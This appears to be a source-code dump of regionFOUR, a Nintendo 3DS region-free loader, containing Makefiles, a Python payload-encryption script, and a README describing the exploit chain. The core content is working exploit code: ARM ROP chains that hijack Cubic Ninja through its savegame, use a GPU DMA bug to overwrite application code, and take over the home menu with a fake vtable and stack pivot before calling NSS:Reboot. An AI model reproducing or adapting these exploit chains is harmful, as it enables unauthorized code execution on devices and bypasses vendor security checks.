38 | 	echo "extern const u32" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`_size";" >> source/`(echo $(<F) | tr . _)`.h
39 | endef
40 | 
41 | .PHONY:=all dirs
42 | 
43 | all: dirs $(PROJECTNAME).bin
44 | 
45 | dirs:
46 | 	@mkdir -p build
47 | 
48 | ctrulib:
49 | 	cd "$(CTRULIB)" && make
50 | 
51 | $(PROJECTNAME).bin: $(PROJECTNAME).elf
52 | 	$(OBJCOPY) -O binary $< $@
53 | 
54 | $(PROJECTNAME).elf: $(OFILES) ctrulib
55 | 	$(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES)) -g -lctru -lm -lc -lg
56 | 
57 | clean:
58 | 	@rm -f build/*.o build/*.d
59 | 	@rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin
60 | 	@echo "all cleaned up !"
61 | 
62 | -include $(DFILES)
63 | 
64 | build/%.o: source/%.c
65 | 	$(CC) $(CFLAGS) -c $< -o $@
66 | 	@$(CC) -MM $< > build/$*.d
67 | 
68 | build/%.o: source/%.s
69 | 	$(CC) $(CFLAGS) -c $< -o $@
70 | 	@$(CC) -MM $< > build/$*.d
71 | 
72 | build/%.bin.o: data/%.bin
73 | 	@echo $(notdir $<)
74 | 	@$(bin2o)
75 | 


--------------------------------------------------------------------------------
/cn_secondary_payload/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | DEFINES	:=	
14 | LDPATH	:=	ccd00.ld
15 | 
16 | ifneq ($(strip $(LOADROPBIN)),)
17 | 	DEFINES	:=	$(DEFINES) -DLOADROPBIN=1
18 | endif
19 | 
20 | ifneq ($(strip $(OTHERAPP)),)
21 | 	DEFINES	:=	$(DEFINES) -DOTHERAPP=1
22 | 	LDPATH	:=	otherapp.ld
23 | endif
24 | 
25 | CC = arm-none-eabi-gcc
26 | # LINK = arm-none-eabi-gcc
27 | LINK = arm-none-eabi-ld
28 | AS = arm-none-eabi-as
29 | OBJCOPY = arm-none-eabi-objcopy
30 | CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include $(DEFINES)
31 | LDFLAGS += --script=$(LDPATH) -L"$(DEVKITARM)/arm-none-eabi/lib" -L"$(CTRULIB)/lib" -Map=output.map
32 | 
33 | CFILES = $(wildcard source/*.c)
34 | BINFILES = $(wildcard data/*.bin)
35 | OFILES = $(BINFILES:data/%.bin=build/%.bin.o)
36 | OFILES += $(CFILES:source/%.c=build/%.o)
37 | DFILES = $(CFILES:source/%.c=build/%.d)
38 | SFILES = $(wildcard source/*.s)
39 | OFILES += $(SFILES:source/%.s=build/%.o)
40 | PROJECTNAME = ${shell basename "$(CURDIR)"}
41 | CWD = "$(CURDIR)""
42 | 
43 | #---------------------------------------------------------------------------------
44 | # canned command sequence for binary data, taken from devkitARM
45 | #---------------------------------------------------------------------------------
46 | define bin2o
47 | 	bin2s $< | $(AS) -o $(@)
48 | 	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"_end[];" > source/`(echo $(<F) | tr . _)`.h
49 | 	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"[];" >> source/`(echo $(<F) | tr . _)`.h
50 | 	echo "extern const u32" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`_size";" >> source/`(echo $(<F) | tr . _)`.h
51 | endef
52 | 
53 | .PHONY:=all
54 | 
55 | all: $(PROJECTNAME).bin
56 | 
57 | ctrulib:
58 | 	cd "$(CTRULIB)" && make
59 | 
60 | $(PROJECTNAME).bin: $(PROJECTNAME).elf
61 | 	$(OBJCOPY) -O binary $< $@
62 | 
63 | $(PROJECTNAME).elf: $(OFILES) ctrulib
64 | 	$(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES)) -g -lctru -lm -lc -lg
65 | 
66 | clean:
67 | 	@rm -f build/*.o build/*.d
68 | 	@rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin
69 | 	@rm -f data/*
70 | 	@echo "all cleaned up !"
71 | 
72 | -include $(DFILES)
73 | 
74 | build/%.o: source/%.c
75 | 	$(CC) $(CFLAGS) -c $< -o $@
76 | 	@$(CC) $(DEFINES) -MM $< > build/$*.d
77 | 
78 | build/%.o: source/%.s
79 | 	$(CC) $(CFLAGS) -c $< -o $@
80 | 	@$(CC) $(DEFINES) -MM $< > build/$*.d
81 | 
82 | build/%.bin.o: data/%.bin
83 | 	@echo $(notdir $<)
84 | 	@$(bin2o)
85 | 
86 | 


--------------------------------------------------------------------------------
/scripts/crypt.py:
--------------------------------------------------------------------------------
  1 | import os
  2 | import sys
  3 | import struct
  4 | import ctypes
  5 | import compress
  6 | #compress.py from https://github.com/magical/nlzss/blob/master/compress.py
  7 | #slightly modified padding
  8 | 
  9 | def getWord(b, k, n=4):
 10 | 	return sum(list(map(lambda c: b[k+c]<<(c*8),range(n))))
 11 | 
 12 | def loadSP(fn):
 13 | 	f=open(fn,"rb")
 14 | 
 15 | 	P=[]
 16 | 	for i in range(18):
 17 | 		P.append(struct.unpack("I",f.read(4))[0])
 18 | 
 19 | 	S=[[],[],[],[]]
 20 | 
 21 | 	for i in range(4):
 22 | 		for j in range(256):
 23 | 			S[i].append(struct.unpack("I",f.read(4))[0])
 24 | 
 25 | 	f.close()
 26 | 
 27 | 	return S, P
 28 | 
 29 | # 2 functions stolen from http://felipetonello.com/scripts/python/blowfish.txt
 30 | def F(S, P, xl):
 31 | 	a = (xl & 0xFF000000) >> 24
 32 | 	b = (xl & 0x00FF0000) >> 16
 33 | 	c = (xl & 0x0000FF00) >> 8
 34 | 	d = xl & 0x000000FF
 35 | 	return ((S[0][a] + S[1][b]) ^ S[2][c]) + S[3][d];
 36 | 
 37 | def cipher(S, P, xl, xr, direction):
 38 | 	if direction == 0: #ENCRYPT
 39 | 		for i in range (16):
 40 | 			xl = xl ^ P[i]
 41 | 			xr = F(S,P,xl) ^ xr
 42 | 			xl, xr = xr, xl
 43 | 		xl, xr = xr, xl
 44 | 		xr = xr ^ P[16]
 45 | 		xl = xl ^ P[17]
 46 | 	else: #DECRYPT
 47 | 		for i in range (17, 1, -1):
 48 | 			xl = xl ^ P[i]
 49 | 			xr = F(S,P,xl) ^ xr
 50 | 			xl, xr = xr, xl
 51 | 		xl, xr = xr, xl
 52 | 		xr = xr ^ P[1]
 53 | 		xl = xl ^ P[0]
 54 | 	return xl, xr
 55 | 
 56 | def encrypt(din,dout):
 57 | 	l=len(din)
 58 | 	for k in range(0,l,8):
 59 | 		l=getWord(din,k)
 60 | 		r=getWord(din,k+4)
 61 | 		ret=cipher(S,P,l,r,0)
 62 | 		dout[(k):(k+4)]=struct.pack("I",ret[0]&0xFFFFFFFF)
 63 | 		dout[(k+4):(k+8)]=struct.pack("I",ret[1]&0xFFFFFFFF)
 64 | 
 65 | def calcCRC(d):
 66 | 	l=len(d)
 67 | 	R3=0x04C11DB7
 68 | 	R0=0xFFFFFFFF
 69 | 	for R2 in range(l):
 70 | 		R1=d[R2]
 71 | 		R0=R0^(R1<<24)
 72 | 		for R1 in range(8):
 73 | 			if R0&0x80000000==0:
 74 | 				R0=R0<<1
 75 | 			else:
 76 | 				R0=R3^(R0<<1)
 77 | 	R0=R0&0xFFFFFFFF
 78 | 	return ctypes.c_uint(~R0).value
 79 | 
 80 | path="./"
 81 | if len(sys.argv)>2:
 82 | 	path=sys.argv[2]
 83 | 
 84 | data=bytearray(open(sys.argv[1],"rb").read())
 85 | padding=compress.compress(data, open("tmp","wb"))
 86 | 
 87 | cdata=bytearray(open("tmp","rb").read())
 88 | crc=calcCRC(cdata[0:(len(cdata)-padding)])
 89 | 
 90 | data=bytearray(len(cdata)+7)
 91 | data[0x7:(0x7+len(cdata))]=cdata[:]
 92 | data[0x3]=(crc)&0xFF
 93 | data[0x4]=(crc>>8)&0xFF
 94 | data[0x5]=(crc>>16)&0xFF
 95 | data[0x6]=(crc>>24)&0xFF
 96 | 
 97 | #data[0x1] and data[0x2] : unused ?
 98 | 
 99 | data[0x0]=0x80|(padding&0x7)
100 | 
101 | dataOut=data[:]
102 | 
103 | (S,P)=loadSP(path+"/blowfish_processed.bin")
104 | encrypt(data,dataOut)
105 | 
106 | #weird quirk
107 | l=len(dataOut)
108 | v=dataOut[0x00]
109 | dataOut[0x00]=dataOut[0x01]
110 | dataOut[0x01]=dataOut[l-1]
111 | dataOut[l-1]=v
112 | 
113 | # v=len(data)
114 | # l=[]
115 | # while v!=0x00:
116 | # 	l.insert(0,v&0xf)
117 | # 	v=v>>4
118 | # if len(l)%2!=0:
119 | # 	l.insert(0,0x0)
120 | # l.insert(0,0x4)
121 | 
122 | # v=0
123 | # for k in range(1,len(l),2):
124 | # 	dataOut.insert(0,(l[k]<<4)|l[k+1])
125 | # dataOut.insert(0,0x04)
126 | 
127 | # l=len(dataOut)
128 | # dataQr=dataOut[:]
129 | # for k in range(1,l-1):
130 | # 	dataQr[k-1]=(((dataOut[k-1]&0xF)<<4)|((dataOut[k]>>4)&0xF))
131 | # open(sys.argv[1]+".out","wb").write(dataQr)
132 | 
133 | # open("debug","wb").write(data)
134 | open("tmp","wb").write(dataOut)
135 | # os.system(path+"/qrcode.exe -8 -o "+sys.argv[1]+".png < tmp")
136 | 


--------------------------------------------------------------------------------
/menu_payload/menu_payload_regionfree.s:
--------------------------------------------------------------------------------
  1 | .nds
  2 | 
  3 | .include "../build/constants.s"
  4 | 
  5 | .create "menu_payload_regionfree.bin",0x0
  6 | 
  7 | MENU_OBJECT_LOC equ 0xBABE0000 ; for relocation
  8 | 
  9 | MENU_PAD equ 0x1000001C
 10 | MENU_KEYCOMBO equ 0x00000008 ; START
 11 | MENU_SLEEP equ ROP_MENU_SLEEPTHREAD
 12 | 
 13 | ; basically we overwrite an object's data to get home menu to do what we want
 14 | ; first we overwrite the vtable pointer so that we can get the code to jump to where we want
 15 | ; the method we use for that is located at vtable + 0x8
 16 | ; with that we can put a in our vtable to our stack pivot
 17 | ; our stack pivot works by loading a bunch of registers from [r4]
 18 | ; fortunately we know r4 = object + 0x4, so we manufacture our object accordingly
 19 | ; and then we get ROP under home menu ! from there we wait for keypress and then do ns:s reboot
 20 | 
 21 | .orga 0x0
 22 | 
 23 | 	object:
 24 | 		.word MENU_OBJECT_LOC + vtable - object ; pointer to manufactured vtable, and new sp
 25 | 		.word ROP_MENU_POP_PC ; pc (pop {pc} to jump to ROP)
 26 | 
 27 | 		.word 0xDEADCAFE ; filler to avoid having stuff overwritten
 28 | 		.word 0xDEADCAFE ; filler to avoid having stuff overwritten
 29 | 		.word 0xDEADCAFE ; filler to avoid having stuff overwritten
 30 | 		.word 0xDEADCAFE ; filler to avoid having stuff overwritten
 31 | 
 32 | 	vtable: ; also initial ROP
 33 | 		.word ROP_MENU_POP_R4R5PC ; pop {r4, r5, pc} : skip pivot
 34 | 			.word 0xDEADBABE ; r4 (garbage)
 35 | 			.word ROP_MENU_STACK_PIVOT ; stack pivot ; also r5 (garbage)
 36 | 	rop: ; real ROP starts here
 37 | 		; loop until keycombo pressed
 38 | 		rop_MENU_loop:
 39 | 			; load current PAD value
 40 | 			.word ROP_MENU_POP_R0PC ; pop {r0, pc}
 41 | 				.word MENU_PAD ; r0 (PAD)
 42 | 			.word ROP_MENU_LDR_R0R0_POP_R4PC ; ldr r0, [r0] ; pop {r4, pc}
 43 | 				.word MENU_KEYCOMBO ; r4 (keycombo)
 44 | 			; mask it with desired key combo
 45 |   			.word ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC ; and r0, r0, r4 ; pop {r4, r5, r6, r7, r8, pc}
 46 | 				.word 0xDEADBABE ; r4 (garbage)
 47 | 				.word 0xDEADBABE ; r5 (garbage)
 48 | 				.word 0xDEADBABE ; r6 (garbage)
 49 | 				.word 0xDEADBABE ; r7 (garbage)
 50 | 				.word 0xDEADBABE ; r8 (garbage)
 51 | 			; compare to keycombo value
 52 | 			.word ROP_MENU_POP_R1PC ; pop {r1, pc}
 53 | 				.word MENU_KEYCOMBO
 54 |   			.word ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC ; cmp r0, r1 ; mvnls r0, #0 ; movhi r0, #1 ; pop {r4, pc}
 55 | 				.word 0xDEADBABE ; r4 (garbage)
 56 | 			; overwrite stack pivot with NOP if equal
 57 | 			.word ROP_MENU_POP_R2R3R4R5R6PC ; pop {r2, r3, r4, r5, r6, pc}
 58 | 				.word MENU_OBJECT_LOC + loop_pivot - object - 0x30 ; r2 (destination - 0x30)
 59 | 				.word 0xDEADBABE ; r3 (garbage)
 60 | 				.word 0xDEADBABE ; r4 (garbage)
 61 | 				.word ROP_MENU_POP_PC ; r5 (nop)
 62 | 				.word 0xDEADBABE ; r6 (garbage)
 63 | 			.word ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC ; streq r5, [r2, #0x30] ; pop {r4, r5, r6, pc}
 64 | 				.word MENU_OBJECT_LOC + 4 - object ; r4 (pivot data location)
 65 | 				.word 0xDEADBABE ; r5 (garbage)
 66 | 				.word 0xDEADBABE ; r6 (garbage)
 67 | 			; execute stack pivot to loop back only if we've hit the keycombo
 68 | 			loop_pivot:
 69 | 			.word ROP_MENU_STACK_PIVOT
 70 | 
 71 | 		; NSS:Reboot
 72 | 			.word ROP_MENU_POP_R0PC ; pop {r0, pc}
 73 | 				.word 0x00000001 ; r0 (flag)
 74 | 			.word ROP_MENU_POP_R1PC ; pop {r1, pc}
 75 | 				.word nssRebootData + MENU_OBJECT_LOC - object ; r1 (PID followed by mediatype and reserved)
 76 | 			.word ROP_MENU_POP_R2R3R4R5R6PC ; pop {r2, r3, r4, r5, r6, pc}
 77 | 				.word 0x00000000 ; r2 (flag 2)
 78 | 				.word 0xDEADBABE ; r3 (garbage)
 79 | 				.word 0xDEADBABE ; r4 (garbage)
 80 | 				.word 0xDEADBABE ; r5 (garbage)
 81 | 				.word 0xDEADBABE ; r6 (garbage)
 82 | 			.word ROP_MENU_NSS_REBOOT
 83 | 				.word 0xDEADBABE ; (garbage)
 84 | 				.word 0xDEADBABE ; (garbage)
 85 | 				.word 0xDEADBABE ; (garbage)
 86 | 				.word 0xDEADBABE ; r4 (garbage)
 87 | 				.word 0xDEADBABE ; r5 (garbage)
 88 | 			.word ROP_MENU_POP_R0PC ; pop {r0, pc}
 89 | 				.word 0xFFFFFFFF ; r0
 90 | 			.word ROP_MENU_POP_R1PC ; pop {r1, pc}
 91 | 				.word 0x0FFFFFFF ; r1
 92 | 			.word MENU_SLEEP
 93 | 
 94 | 	nssRebootData:
 95 | 		.word 0x00000000 ; lower word PID (0 for gamecard)
 96 | 		.word 0x00000000 ; upper word PID
 97 | 		.word 0x00000002 ; mediatype (2 for gamecard)
 98 | 		.word 0x00000000 ; reserved
 99 | 
100 | .Close
101 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | regionFOUR
 2 | =======
 3 | 
 4 | regionFOUR is a region free loader for New3DS/New3DSXL/3DS/3DSXL/2DS which currently works on on firmware versions 9.0 through 9.8 (including 9.1, 9.2, 9.3, 9.4, 9.5, 9.6 and 9.7). It also allows you to bypass mandatory gamecard firmware updates.
 5 | 
 6 | It is a successor to regionthree made to rely on an exploit game (currently cubic ninja, see below regarding other apps) rather than the web browser. as such it only requires an internet connection the first time it is run, and can then be run offline.
 7 | 
 8 | ### How to use
 9 | 
10 | Please see instructions on how to run regionFOUR on its webpage : http://smealum.net/regionfour/
11 | 
12 | ### FAQ
13 | 
14 | - Does this work on the latest firmware version ? Yes, 9.8 is supported.
15 | - Does this let me run homebrew and/or roms ? No, it only lets you run legit physical games from other regions.
16 | - Do I need to connect to the internet every time I want to use this ? No, you only need to connect to the internet the first time. You can then install it to your gamecard's savegame.
17 | - Do I need a flashcart/game/hardware for this ? Yes, regionFOUR currently requires that you own a copy of Cubic Ninja(see below regarding other apps) from your own region to run.
18 | - Will this work on my New 3DS ? Yes, this works on the New 3DS, the New 3DS XL, as well as the 3DS, the 3DS XL and the 2DS.
19 | - I already have an exploit installed on my copy of Cubic Ninja, how do I use regionFOUR ? You can uninstall any Cubic Ninja exploit by holding L + R + X + Y in Cubic Ninja's main menu.
20 | - Will this break or brick my 3DS ? No. There's virtually 0 chance of that happening, all this runs is run of the mill usermode code, nothing dangerous. Nothing unusual is written to your NAND, nothing permanent is done. With that in mind, use at your own risk, I won't take responsibility if something weird does happen.
21 | - Will every game work ? No. Unfortunately, though most will, some games will not work properly with regionFOUR. One prominent such example is The Legend of Zelda - Majora's Mask.
22 | - Do you take donations ? No, I do not.
23 | - How does it work ? See below.
24 | 
25 | ### Technical stuff
26 | 
27 | Basically I reuse some ninjhax stuff to get code exec under an application (cubic ninja). From there I use the gspwn exploit to takeover home menu by overwriting a target object located on its linear heap with specially crafted data. With a fake vtable and a nice stack pivot I'm able to get ROP under home menu, and from there I ROP my way into calling NSS:Reboot to bypass the region check.
28 | 
29 | For more detail on the cubic-ninja part of regionFOUR and the GPU DMA exploit (gspwn), visit http://smealum.net/?p=517
30 | 
31 | To build the ROP, use Kingcom's armips assembler https://github.com/Kingcom/armips
32 | 	
33 | You will also need the processed blowfish key data for qr code crypto(not needed when building with --enableotherapp). It can be extracted from a ramdump or generated from exefs data :
34 | 
35 | 	scripts/blowfish_processed.bin
36 | 
37 | That done, building is very easy. Open a terminal, cd to the ninjhax directory, and :
38 | 
39 | - To build ninjhax for a single specific firmware version, use (replace "N9.2.0-22J" with firmware version; the N is for New 3DS/XL, just remove it to compile for old) : `python scripts/buildVersion.py "N9.2.0-22J"`
40 | - To build all versions : `python scripts/buildAll.py`
41 | 
42 | To build with ropbin-loading enabled, use this: `python scripts/buildAll.py --enableloadropbin` or `python scripts/buildVersion.py "{version}" --enableloadropbin`. With this, the initial homemenu ROP will just stack-pivot to the ROP-chain from menu_ropbin.bin(see "firm_constants/" for the ropbin address). This comes from "menu_payload/menu_ropbin_{version}_{old/new}3ds.bin". This is embedded in cn_seconary_payload. Since this is intended for easily running general homemenu ROP(not just region-free), "menu_payload/menu_ropbin_{version}_{old/new}3ds.bin" will not be built from anything by these Makefiles. Hence, when using this option the ropbins at "menu_payload/menu_ropbin_{version}_{old/new}3ds.bin" for each version must already exist before building.
43 | 
44 | To build cn_secondary_payload binaries which can then be run under non-cubicninja apps, pass the --enableotherapp option to either of the above build scripts. The built binaries are only new3ds/old3ds + system-version specific, region is not relevant for the built payload. QR code building and cn_save_initial_loader building are skipped with this option. See cn_secondary_payload/otherapp.ld for the binary base address. The payload *must* be called with r0 set to an address for a paramblk structure, see cn_secondary_payload or oot3dhax for the format of that structure. This allows the payload to be used under any app where the exploit which loaded the payload setup a paramblk struct correctly, including OoT3D: https://github.com/yellows8/oot3dhax
45 | 
46 | ### Credits
47 | 
48 | - All original ROP and code on this repo written by smea
49 | - ns:s region free booting trick and home menu stack pivot found by yellows8
50 | - yellows8 and Myria for helping with testing.
51 | - plutoo <3
52 | - yellows8 for loadropbin functionality and non-cubicninja support in the payload.
53 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/sploit.s:
--------------------------------------------------------------------------------
  1 | .nds
  2 | 
  3 | .include "../../build/constants.s"
  4 | 
  5 | .open "sploit_proto.bin","cn_save_initial_loader.bin",0x0
  6 | 
  7 | .arm
  8 | 
  9 | CN_CODELOCATIONVA equ (CN_HEAPPAYLOADADR+codePatch-ROP)
 10 | CN_GXCOMMAND_ADR equ (CN_GSPHEAP+0x000F0000)
 11 | CN_TMPVAR_ADR equ (CN_GSPHEAP+0x000E0000)
 12 | 
 13 | ;length
 14 | .orga 0x60
 15 | 	.word endROP-ROP+0xA8-0x64
 16 | 	; .word secondaryROP-ROP+0xA8-0x64
 17 | 
 18 | ;ROP
 19 | .orga 0xA8
 20 | ROP:
 21 | 	;jump to safer place
 22 | 		
 23 | 		.word 0x002c9628 ; pop	{r0, pc}
 24 | 			.word 0x0FFFFF28 ; r0 
 25 | 		.word 0x001dd62c ; ldr r0, [r0] | pop {r4, pc}
 26 | 			.word CN_TMPVAR_ADR ; r4 (tmp var adr)
 27 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 28 | 			.word -(CN_STACKPAYLOADADR-0xA8) ; r4 (offset)
 29 | 		.word 0x001e2c08 ; add r0, r0, r4 | pop {r4, pc}
 30 | 			.word CN_STACKPAYLOADADR+filePayloadOffset-ROP ; r4 (garbage)
 31 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 32 | 			.word 0xDEADC0DE ; r4 (garbage)
 33 | 		.word 0x001001c8 ; pop {r3} | add sp, sp, r3 | pop {pc}
 34 | 		filePayloadOffset:
 35 | 			.word 0xDEADC0DE ; r3 (garbage because gets overwritten by previous gadget)
 36 | 
 37 | secondaryROP:
 38 | 
 39 | 	;copy code to GSP heap
 40 | 		.word 0x001bbeb8 ; pop {r3, pc}
 41 | 			.word 0x002c9628 ; r3 (pop {r0, pc})
 42 | 		.word 0x00106eb8 ; pop {r4, lr} | bx r3
 43 | 			.word 0xDEADC0DE ; r4 (garbage)
 44 | 			.word 0x002c9628 ; lr (pop	{r0, pc})
 45 | 		;equivalent to .word 0x002c9628 ; pop {r0, pc}
 46 | 			.word CN_TMPVAR_ADR-4 ; r0 (tmp var)
 47 |   		.word 0x002c7784 ; ldr r1, [r0, #4] | add r0, r0, r1 | pop {r3, r4, r5, pc}
 48 | 			.word 0xDEADC0DE ; r3 (garbage)
 49 | 			.word 0xDEADC0DE ; r4 (garbage)
 50 | 			.word 0xDEADC0DE ; r5 (garbage)
 51 | 		.word 0x002c9628 ; pop	{r0, pc}
 52 | 			.word CN_CODELOCATIONGSP-codePatch ; r0 (dst)
 53 | 		.word 0x0020b8e8 ; pop	{r2, r3, r4, pc}
 54 | 			.word codePatchEnd ; r2 (size)
 55 | 			.word 0xDEADC0DE ; r3 (garbage)
 56 | 			.word 0xDEADC0DE ; r4 (garbage)
 57 | 		.word 0x00224FB0 ; memcpy (ends in BX LR)
 58 | 
 59 | 	;flush data cache
 60 | 		;equivalent to .word 0x002c9628 ; pop {r0, pc}
 61 | 			.word CN_GSPHANDLE_ADR ; r0 (handle ptr)
 62 | 		.word 0x00226734 ; pop	{r1, pc}
 63 | 			.word 0xFFFF8001 ; r1 (kprocess handle)
 64 | 		.word 0x0020b8e8 ; pop	{r2, r3, r4, pc}
 65 | 			.word CN_CODELOCATIONGSP  ; r2 (address)
 66 | 			.word codePatchEnd-codePatch ; r3 (size)
 67 | 			.word 0xDEADC0DE ; r4 (garbage)
 68 | 		.word CN_GSPGPU_FlushDataCache_ADR+4 ; GSPGPU_FlushDataCache (ends in LDMFD   SP!, {R4-R6,PC})
 69 | 			.word 0xDEADC0DE ; r4 (garbage)
 70 | 			.word 0xDEADC0DE ; r5 (garbage)
 71 | 			.word 0xDEADC0DE ; r6 (garbage)
 72 | 
 73 | 
 74 | 	;create GX command
 75 | 		.word 0x001dd630 ; pop {r4, pc}
 76 | 
 77 | 			.word CN_GXCOMMAND_ADR+0x0 ; r4
 78 | 		.word 0x002c9628 ; pop	{r0, pc}
 79 | 			.word 0x00000004
 80 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 81 | 
 82 | 			.word CN_GXCOMMAND_ADR+0x4 ; r4
 83 | 		.word 0x002c9628 ; pop	{r0, pc}
 84 | 			.word CN_CODELOCATIONGSP
 85 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 86 | 
 87 | 			.word CN_GXCOMMAND_ADR+0x8 ; r4
 88 | 		.word 0x002c9628 ; pop	{r0, pc}
 89 | 			.word CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+CN_INITIALCODE_OFFSET+FIRM_APPMEMALLOC ; r0
 90 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 91 | 
 92 | 			.word CN_GXCOMMAND_ADR+0xC ; r4
 93 | 		.word 0x002c9628 ; pop	{r0, pc}
 94 | 			.word 0x00010000
 95 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 96 | 
 97 | 			.word CN_GXCOMMAND_ADR+0x10 ; r4
 98 | 		.word 0x002c9628 ; pop	{r0, pc}
 99 | 			.word 0x00000000
100 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
101 | 
102 | 			.word CN_GXCOMMAND_ADR+0x14 ; r4
103 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
104 | 			
105 | 			.word CN_GXCOMMAND_ADR+0x18 ; r4
106 | 		.word 0x002c9628 ; pop	{r0, pc}
107 | 			.word 0x00000008
108 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
109 | 
110 | 			.word CN_GXCOMMAND_ADR+0x1C ; r4
111 | 		.word 0x002c9628 ; pop	{r0, pc}
112 | 			.word 0x00000000
113 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
114 | 			.word 0xDEADC0DE ; r4 (garbage)
115 | 
116 | 	;send GX command
117 | 		.word 0x002c9628 ; pop	{r0, pc}
118 | 			.word 0x356208+0x58 ; r0
119 | 		.word 0x00226734 ; pop	{r1, pc}
120 | 			.word CN_GXCOMMAND_ADR ; r1 (cmd addr)
121 | 		.word CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue+4 ; nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue (ends in LDMFD   SP!, {R4-R8,PC})
122 | 			.word 0xDEADC0DE ; r4 (garbage)
123 | 			.word 0xDEADC0DE ; r5 (garbage)
124 | 			.word 0xDEADC0DE ; r6 (garbage)
125 | 			.word 0xDEADC0DE ; r7 (garbage)
126 | 			.word 0xDEADC0DE ; r8 (garbage)
127 | 
128 | 	;sleep for a second and jump to code
129 | 		.word 0x00226734 ; pop {r3, pc}
130 | 			.word 0x002c9628 ; r1 (pop {r0, pc})
131 | 		.word 0x0012ec64 ; pop {r4, lr} | bx r1
132 | 			.word 0xDEADC0DE ; r4 (garbage)
133 | 			.word 0x002c9628 ; lr (pop {r0, pc})
134 | 		;equivalent to .word 0x002c9628 ; pop {r0, pc}
135 | 			.word 0x3B9ACA00 ; r0 = 1 second
136 | 		.word 0x00226734 ; pop	{r1, pc}
137 | 			.word 0x00000000 ; r1
138 | 		.word 0x00293D14 ; svcSleepThread (ends in BX	LR)
139 | 		;equivalent to .word 0x002c9628 ; pop {r0, pc}
140 | 			.word 0x00000000 ; r0 (time_low)
141 | 		.word 0x00226734 ; pop	{r1, pc}
142 | 			.word 0x00000000 ; r1 (time_high)
143 | 		.word 0x00100000+CN_INITIALCODE_OFFSET ;jump to code
144 | 
145 | 		.word 0xBEEF0000
146 | endROP:
147 | 
148 | .align 4
149 | codePatch:
150 | 	.incbin "cn_initial/cn_initial.bin"
151 | 	.word 0xDEADDEAD
152 | 	.word 0xDEADDEAD
153 | 	.word 0xDEADDEAD
154 | 	.word 0xDEADDEAD
155 | codePatchEnd:
156 | 
157 | .Close
158 | 


--------------------------------------------------------------------------------
/web/hbrew.css:
--------------------------------------------------------------------------------
  1 | html, body {
  2 |   height: 100%;
  3 |   width: 100%;
  4 |   padding: 0;
  5 |   margin: 0;
  6 | }
  7 | 
  8 | body {
  9 | 	margin: 0px;
 10 | 	padding: 0px;
 11 | 	/*background: url(images/bkg.jpg) repeat #000;*/
 12 | 	font-family: 'Homenaje', sans-serif;
 13 | 	font-size: 14pt;
 14 | 	background-color: #000000;
 15 | 	color: #B0B0B0;
 16 | }
 17 | 
 18 | 
 19 | h1, h2, h3 {
 20 | 	margin: 0;
 21 | 	padding: 0;
 22 | }
 23 | 
 24 | h2
 25 | {
 26 | 	font-weight: 400;
 27 | 	font-family: Arial, Helvetica, sans-serif;
 28 | 	font-size: 1.7em;
 29 | }
 30 | 
 31 | p, ol, ul {
 32 | 	margin-top: 0px;
 33 | }
 34 | 
 35 | p {
 36 | 	line-height: 180%;
 37 | }
 38 | 
 39 | strong {
 40 | }
 41 | 
 42 | a {
 43 | 	color: #1492C4;
 44 | 	text-decoration:none;
 45 | }
 46 | 
 47 | a:hover {
 48 | 	text-decoration: none;
 49 | }
 50 | 
 51 | a img {
 52 | 	border: none;
 53 | }
 54 | 
 55 | img.border {
 56 | 	border: 1px solid #fff;
 57 | }
 58 | 
 59 | .video {
 60 | border: 1px solid #fff;
 61 | }
 62 | 
 63 | img.alignleft {
 64 | 	float: left;
 65 | 	margin-right: 30px;
 66 | }
 67 | 
 68 | img.alignright {
 69 | 	float: right;
 70 | }
 71 | 
 72 | img.aligncenter {
 73 | 	margin: 0px auto;
 74 | }
 75 | 
 76 | hr {
 77 | 	display: none;
 78 | }
 79 | 
 80 | #wrapper {
 81 | 	position: relative;
 82 | 	/*width: 1250px;*/
 83 | 	min-height: 600px;
 84 | 	margin-bottom: 0px;
 85 | 	margin-top:75px;
 86 | }
 87 | 
 88 | #wrapper {
 89 | 	overflow: hidden;
 90 | 	margin-right: auto;
 91 | 	margin-left: auto;
 92 | }
 93 | 
 94 | .container {
 95 | 	width: 1250px;
 96 | 	margin: 0px 0px 0 0;
 97 | }
 98 | 
 99 | .clearfix {
